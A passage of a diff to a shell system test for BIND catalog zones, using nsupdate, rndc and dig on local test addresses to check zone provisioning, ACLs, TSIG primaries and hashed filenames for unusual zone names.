4346f565b4d63ddb99e5d2497ff22d04e878e8f8.zones.catalog1.example. 3600 IN PTR dom6.example. 
+ send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: deleting zone 'dom6.example' from catalog 'catalog1.example' - success" > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################################## +n=$((n+1)) +echo_i "Checking that a missing zone directory forces in-memory ($n)" +ret=0 +grep "'nonexistent' not found; zone files will not be saved" ns2/named.run > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################################## +echo_i "Testing allow-query and allow-transfer ACLs" +n=$((n+1)) +echo_i "adding domains dom7.example. and dom8.example. to primary via RNDC ($n)" +ret=0 +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom7.example.db +echo "@ IN NS invalid." >> ns1/dom7.example.db +rndccmd 10.53.0.1 addzone dom7.example. '{type primary; file "dom7.example.db";};' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom8.example.db +echo "@ IN NS invalid." >> ns1/dom8.example.db +rndccmd 10.53.0.1 addzone dom8.example. '{type primary; file "dom8.example.db";};' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom7.example. is now served by primary ($n)" +ret=0 +wait_for_soa @10.53.0.1 dom7.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "adding domain dom7.example. 
to catalog1 zone with an allow-query statement ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add 78833ec3c0059fd4540fee81c7eaddce088e7cd7.zones.catalog1.example. 3600 IN PTR dom7.example. + update add allow-query.78833ec3c0059fd4540fee81c7eaddce088e7cd7.zones.catalog1.example. 3600 IN APL 1:10.53.0.1/32 !1:10.53.0.0/30 1:0.0.0.0/0 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'dom7.example' from catalog 'catalog1.example'" > /dev/null && +wait_for_message ns2/named.run "transfer of 'dom7.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom7.example. is accessible from 10.53.0.1 ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom7.example. dig.out.test$n -b 10.53.0.1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom7.example. is not accessible from 10.53.0.2 ($n)" +ret=0 +wait_for_no_soa @10.53.0.2 dom7.example. dig.out.test$n -b 10.53.0.2 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom7.example. is accessible from 10.53.0.5 ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom7.example. dig.out.test$n -b 10.53.0.5 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null +n=$((n+1)) +echo_i "adding dom8.example. domain and global allow-query and allow-transfer ACLs ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add cba95222e308baba42417be6021026fdf20827b6.zones.catalog1.example. 3600 IN PTR dom8.example + update add allow-query.catalog1.example. 
3600 IN APL 1:10.53.0.1/32 + update add allow-transfer.catalog1.example. 3600 IN APL 1:10.53.0.2/32 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: update_from_db: new zone merged" && +wait_for_message ns2/named.run "transfer of 'dom8.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom8.example. is accessible from 10.53.0.1 ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom8.example. dig.out.test$n -b 10.53.0.1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom8.example. is not accessible from 10.53.0.2 ($n)" +ret=0 +wait_for_no_soa @10.53.0.2 dom8.example. dig.out.test$n -b 10.53.0.2 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom8.example. is not AXFR accessible from 10.53.0.1 ($n)" +ret=0 +dig_with_opts @10.53.0.2 axfr dom8.example. -b 10.53.0.1 > dig.out.test$n +grep "Transfer failed." dig.out.test$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom8.example. is AXFR accessible from 10.53.0.2 ($n)" +ret=0 +dig_with_opts @10.53.0.2 axfr dom8.example. -b 10.53.0.2 > dig.out.test$n +grep -v "Transfer failed." dig.out.test$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null +n=$((n+1)) +echo_i "deleting global allow-query and allow-domain ACLs ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete allow-query.catalog1.example. 3600 IN APL 1:10.53.0.1/32 + update delete allow-transfer.catalog1.example. 
3600 IN APL 1:10.53.0.2/32 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) +ret=0 +wait_for_message ns2/named.run "catz: update_from_db: new zone merged" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom8.example. is accessible from 10.53.0.1 ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom8.example. dig.out.test$n -b 10.53.0.1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom8.example. is accessible from 10.53.0.2 ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom8.example. dig.out.test$n -b 10.53.0.2 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom8.example. is AXFR accessible from 10.53.0.1 ($n)" +ret=0 +dig_with_opts @10.53.0.2 axfr dom8.example. -b 10.53.0.1 > dig.out.test$n +grep -v "Transfer failed." dig.out.test$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom8.example. is AXFR accessible from 10.53.0.2 ($n)" +ret=0 +dig_with_opts @10.53.0.2 axfr dom8.example. -b 10.53.0.2 > dig.out.test$n +grep -v "Transfer failed." dig.out.test$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + + +########################################################################## +echo_i "Testing TSIG keys for masters set per-domain" +n=$((n+1)) +echo_i "adding a domain dom9.example. to primary via RNDC, with transfers allowed only with TSIG key ($n)" +ret=0 +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom9.example.db +echo "@ IN NS invalid." >> ns1/dom9.example.db +rndccmd 10.53.0.1 addzone dom9.example. '{type primary; file "dom9.example.db"; allow-transfer { key tsig_key; }; };' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom9.example. 
is now served by primary ($n)"
+ret=0
+wait_for_soa @10.53.0.1 dom9.example. dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+nextpart ns2/named.run >/dev/null
+
+n=$((n+1))
+echo_i "adding domain dom9.example. to catalog1 zone with a valid masters suboption (IP with TSIG) ($n)"
+ret=0
+$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1
+ server 10.53.0.1 ${PORT}
+ update add f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example. 3600 IN PTR dom9.example.
+ update add label1.masters.f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example. 3600 IN A 10.53.0.1
+ update add label1.masters.f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example. 3600 IN TXT "tsig_key"
+ send
+END
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "waiting for secondary to sync up ($n)"
+ret=0
+wait_for_message ns2/named.run "catz: adding zone 'dom9.example' from catalog 'catalog1.example'" &&
+wait_for_message ns2/named.run "transfer of 'dom9.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that dom9.example. is accessible on secondary ($n)"
+ret=0
+wait_for_soa @10.53.0.2 dom9.example. dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "change TSIG key name on primary ($n)"
+ret=0
+rndccmd 10.53.0.1 modzone dom9.example. '{type primary; notify yes; file "dom9.example.db"; allow-transfer { key next_key; }; };' || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "update TSIG key name in catalog zone ($n)"
+ret=0
+$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1
+ server 10.53.0.1 ${PORT}
+ update del label1.masters.f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example.
3600 IN TXT "tsig_key"
+ update add label1.masters.f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example. 3600 IN TXT "next_key"
+ send
+END
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "waiting for secondary to sync up ($n)"
+ret=0
+wait_for_message ns2/named.run "catz: modifying zone 'dom9.example' from catalog 'catalog1.example'" || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "update zone contents and reload ($n)"
+ret=0
+echo "@ 3600 IN SOA . . 2 3600 3600 3600 3600" > ns1/dom9.example.db
+echo "@ IN NS ns2" >> ns1/dom9.example.db
+echo "ns2 IN A 10.53.0.2" >> ns1/dom9.example.db
+rndccmd 10.53.0.1 reload dom9.example. || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "wait for primary to update zone ($n)"
+ret=0
+wait_for_a @10.53.0.1 ns2.dom9.example. dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "wait for secondary to update zone ($n)"
+ret=0
+wait_for_a @10.53.0.2 ns2.dom9.example. dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "deleting domain dom9.example. from catalog1 zone ($n)"
+ret=0
+$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1
+ server 10.53.0.1 ${PORT}
+ update delete f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example. 3600 IN PTR dom9.example.
+ update delete label1.masters.f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example. 3600 IN A 10.53.0.1
+ update delete label1.masters.f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example.
3600 IN TXT "next_key"
+ send
+END
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "waiting for secondary to sync up ($n)"
+ret=0
+wait_for_message ns2/named.run "catz: deleting zone 'dom9.example' from catalog 'catalog1.example' - success" || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that dom9.example. is no longer accessible on secondary ($n)"
+ret=0
+wait_for_no_soa @10.53.0.2 dom9.example. dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+nextpart ns2/named.run >/dev/null
+
+n=$((n+1))
+echo_i "adding domain dom9.example. to catalog1 zone with an invalid masters suboption (TSIG without IP) ($n)"
+ret=0
+$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1
+ server 10.53.0.1 ${PORT}
+ update add f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example. 3600 IN PTR dom9.example.
+ update add label1.masters.f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example. 3600 IN TXT "tsig_key"
+ send
+END
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "waiting for secondary to sync up ($n)"
+ret=0
+wait_for_message ns2/named.run "catz: adding zone 'dom9.example' from catalog 'catalog1.example'" &&
+wait_for_message ns2/named.run "error \"failure\" while trying to generate config for zone \"dom9.example\"" || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "deleting domain dom9.example. from catalog1 zone ($n)"
+ret=0
+$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1
+ server 10.53.0.1 ${PORT}
+ update delete f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example. 3600 IN PTR dom9.example.
+ update delete label1.masters.f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example.
3600 IN TXT "tsig_key"
+ send
+END
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "waiting for secondary to sync up ($n)"
+ret=0
+wait_for_message ns2/named.run "catz: deleting zone 'dom9.example' from catalog 'catalog1.example'" || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+##########################################################################
+echo_i "Testing catalog entries that can't be represented as filenames"
+# note: we need 4 backslashes in the shell to get 2 backslashes in DNS
+# presentation format, which is 1 backslash on the wire.
+for special in \
+ this.is.a.very.very.long.long.long.domain.that.will.cause.catalog.zones.to.generate.hash.instead.of.using.regular.filename.dom10.example \
+ this.zone/domain.has.a.slash.dom10.example \
+ this.zone\\\\domain.has.backslash.dom10.example \
+ this.zone:domain.has.a.colon.dom.10.example
+do
+ # hashes below are generated by:
+ # python ${TOP}/contrib/scripts/catzhash.py "${special}"
+
+ case "$special" in
+ this.is.a.very.very.long.long.long.domain.that.will.cause.catalog.zones.to.generate.hash.instead.of.using.regular.filename.dom10.example)
+ hash=825f48b1ce1b4cf5a041d20255a0c8e98d114858
+ db=__catz__4d70696f2335687069467f11f5d5378c480383f97782e553fb2d04a7bb2a23ed.db
+ ;;
+ this.zone/domain.has.a.slash.dom10.example)
+ hash=e64cc64c99bf52d0a77fb16dd7ed57cf925a36aa
+ db=__catz__46ba3e1b28d5955e5313d5fee61bedc78c71d08035aa7ea2f7bf0b8228ab3acc.db
+ ;;
+ this.zone\\\\domain.has.backslash.dom10.example)
+ hash=91e27e02153d38cf656a9b376d7747fbcd19f985
+ db=__catz__b667f7ff802c0895e0506699951cff9a1cab68c5ef8546aa0d07425f244ed870.db
+ ;;
+ this.zone:domain.has.a.colon.dom.10.example)
+ hash=8b7238bf4c34045834c573ba4116557ebb24d33c
+ db=__catz__5c721f7872913a4e7fa8ad42589cce5dd6e551a4c9e6ab3f86e77c0bbc7c2ca6.db
+ ;;
+ esac
+
+ n=$((n+1))
+ echo_i "checking that ${special}.
is not served by primary ($n)"
+ ret=0
+ wait_for_no_soa @10.53.0.1 "${special}" dig.out.test$n || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "Adding a domain ${special}. to primary via RNDC ($n)"
+ ret=0
+ echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom10.example.db
+ echo "@ IN NS invalid." >> ns1/dom10.example.db
+ rndccmd 10.53.0.1 addzone '"'"${special}"'"' '{type primary; file "dom10.example.db";};' || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking that ${special}. is now served by primary ($n)"
+ ret=0
+ wait_for_soa @10.53.0.1 "${special}." dig.out.test$n || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ nextpart ns2/named.run >/dev/null
+
+ n=$((n+1))
+ echo_i "Adding domain ${special}. to catalog1 zone ($n)"
+ ret=0
+ $NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1
+ server 10.53.0.1 ${PORT}
+ update add ${hash}.zones.catalog1.example 3600 IN PTR ${special}.
+ send
+END
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "waiting for secondary to sync up ($n)"
+ ret=0
+ wait_for_message ns2/named.run "catz: adding zone '$special' from catalog 'catalog1.example'" &&
+ wait_for_message ns2/named.run "transfer of '$special/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking that ${special}. is served by secondary ($n)"
+ ret=0
+ wait_for_soa @10.53.0.2 "${special}." dig.out.test$n || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking that zone-directory is populated with a hashed filename ($n)"
+ ret=0
+ wait_for_zonefile "ns2/zonedir/$db" || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "removing domain ${special}.
from catalog1 zone ($n)"
+ ret=0
+ $NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1
+ server 10.53.0.1 ${PORT}
+ update delete ${hash}.zones.catalog1.example
+ send
+END
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "waiting for secondary to sync up ($n)"
+ ret=0
+ wait_for_message ns2/named.run "zone_shutdown: zone ${special}/IN: shutting down" || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking that ${special}. is not served by secondary ($n)"
+ ret=0
+ wait_for_no_soa @10.53.0.2 "${special}." dig.out.test$n || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking that zone-directory is emptied ($n)"
+ ret=0
+ wait_for_no_zonefile "ns2/zonedir/$db" || ret=1
+ wait_for_no_zonefile "ns2/zonedir/$db.jnl" || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+done
+
+##########################################################################
+echo_i "Testing adding a domain and a subdomain of it"
+n=$((n+1))
+echo_i "checking that dom11.example. is not served by primary ($n)"
+ret=0
+wait_for_no_soa @10.53.0.1 dom11.example. dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "Adding a domain dom11.example. to primary via RNDC ($n)"
+ret=0
+echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom11.example.db
+echo "@ IN NS invalid." >> ns1/dom11.example.db
+rndccmd 10.53.0.1 addzone dom11.example. '{type primary; file "dom11.example.db";};' || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that dom11.example. is now served by primary ($n)"
+ret=0
+wait_for_soa @10.53.0.1 dom11.example.
dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+nextpart ns2/named.run >/dev/null
+
+n=$((n+1))
+echo_i "Adding domain dom11.example. to catalog1 zone ($n)"
+ret=0
+$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1
+ server 10.53.0.1 ${PORT}
+ update add 0580d70e769c86c8b951a488d8b776627f427d7a.zones.catalog1.example. 3600 IN PTR dom11.example.
+ send
+END
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "waiting for secondary to sync up ($n)"
+ret=0
+wait_for_message ns2/named.run "catz: adding zone 'dom11.example' from catalog 'catalog1.example'" &&
+wait_for_message ns2/named.run "transfer of 'dom11.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that dom11.example. is served by secondary ($n)"
+ret=0
+wait_for_soa @10.53.0.2 dom11.example. dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that subdomain.of.dom11.example. is not served by primary ($n)"
+ret=0
+wait_for_rcode NXDOMAIN SOA @10.53.0.1 subdomain.of.dom11.example. dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "Adding a domain subdomain.of.dom11.example. to primary via RNDC ($n)"
+ret=0
+echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/subdomain.of.dom11.example.db
+echo "@ IN NS invalid." >> ns1/subdomain.of.dom11.example.db
+rndccmd 10.53.0.1 addzone subdomain.of.dom11.example. '{type primary; file "subdomain.of.dom11.example.db";};' || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that subdomain.of.dom11.example. is now served by primary ($n)"
+ret=0
+wait_for_soa @10.53.0.1 subdomain.of.dom11.example.
dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+nextpart ns2/named.run >/dev/null
+
+n=$((n+1))
+echo_i "Adding domain subdomain.of.dom11.example. to catalog1 zone ($n)"
+ret=0
+$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1
+ server 10.53.0.1 ${PORT}
+ update add 25557e0bdd10cb3710199bb421b776df160f241e.zones.catalog1.example. 3600 IN PTR subdomain.of.dom11.example.
+ send
+END
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "waiting for secondary to sync up ($n)"
+ret=0
+wait_for_message ns2/named.run "catz: adding zone 'subdomain.of.dom11.example' from catalog 'catalog1.example'" &&
+wait_for_message ns2/named.run "transfer of 'subdomain.of.dom11.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that subdomain.of.dom11.example. is served by secondary ($n)"
+ret=0
+wait_for_soa @10.53.0.2 subdomain.of.dom11.example. dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "removing domain dom11.example. from catalog1 zone ($n)"
+ret=0
+$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1
+ server 10.53.0.1 ${PORT}
+ update delete 0580d70e769c86c8b951a488d8b776627f427d7a.zones.catalog1.example
+ send
+END
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "waiting for secondary to sync up ($n)"
+ret=0
+wait_for_message ns2/named.run "zone_shutdown: zone dom11.example/IN: shutting down" || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that dom11.example. is not served by secondary ($n)"
+ret=0
+wait_for_no_soa @10.53.0.2 dom11.example.
dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that subdomain.of.dom11.example. is still served by secondary ($n)"
+ret=0
+wait_for_soa @10.53.0.2 subdomain.of.dom11.example. dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "removing domain subdomain.of.dom11.example. from catalog1 zone ($n)"
+ret=0
+$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1
+ server 10.53.0.1 ${PORT}
+ update delete 25557e0bdd10cb3710199bb421b776df160f241e.zones.catalog1.example
+ send
+END
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "waiting for secondary to sync up ($n)"
+ret=0
+wait_for_message ns2/named.run "zone_shutdown: zone subdomain.of.dom11.example/IN: shutting down" || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that subdomain.of.dom11.example. is not served by secondary ($n)"
+ret=0
+wait_for_no_soa @10.53.0.2 subdomain.of.d11.example. dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+##########################################################################
+echo_i "Testing adding a catalog zone at runtime with rndc reconfig"
+n=$((n+1))
+echo_i "checking that dom12.example. is not served by primary ($n)"
+ret=0
+wait_for_no_soa @10.53.0.1 dom12.example. dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "Adding a domain dom12.example. to primary via RNDC ($n)"
+ret=0
+echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom12.example.db
+echo "@ IN NS invalid." >> ns1/dom12.example.db
+rndccmd 10.53.0.1 addzone dom12.example. '{type primary; file "dom12.example.db";};' || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that dom12.example.
is now served by primary ($n)"
+ret=0
+wait_for_soa @10.53.0.1 dom12.example. dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+nextpart ns2/named.run >/dev/null
+
+n=$((n+1))
+echo_i "Adding domain dom12.example. to catalog4 zone ($n)"
+ret=0
+$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1
+ server 10.53.0.1 ${PORT}
+ update add 871d51e5433543c0f6fb263c40f359fbc152c8ae.zones.catalog4.example. 3600 IN PTR dom12.example.
+ send
+END
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that dom12.example. is not served by secondary ($n)"
+ret=0
+wait_for_no_soa @10.53.0.2 dom12.example. dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+
+n=$((n+1))
+echo_i "reconfiguring secondary - adding catalog4 catalog zone ($n)"
+ret=0
+sed -e "s/^#T1//g" < ns2/named1.conf.in > ns2/named.conf.tmp
+copy_setports ns2/named.conf.tmp ns2/named.conf
+rndccmd 10.53.0.2 reconfig || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "waiting for secondary to sync up ($n)"
+ret=0
+wait_for_message ns2/named.run "catz: adding zone 'dom12.example' from catalog 'catalog4.example'" &&
+wait_for_message ns2/named.run "transfer of 'dom12.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "checking that dom7.example. is still served by secondary after reconfiguration ($n)"
+ret=0
+wait_for_soa @10.53.0.2 dom7.example. dig.out.test$n -b 10.53.0.1 || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+n=$((n+1))
+
+echo_i "checking that dom12.example. is served by secondary ($n)"
+ret=0
+wait_for_soa @10.53.0.2 dom12.example.
dig.out.test$n || ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "reconfiguring secondary - removing catalog4 catalog zone, adding non-existent catalog5 catalog zone ($n)"
+ret=0
+sed -e "s/^#T2//" < ns2/named1.conf.in > ns2/named.conf.tmp
+copy_setports ns2/named.conf.tmp ns2/named.conf
+$RNDC -c ../common/rndc.conf -s 10.53.0.2 -p "${CONTROLPORT}" reconfig > /dev/null 2>&1 && ret=1
+if [ $ret -ne 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
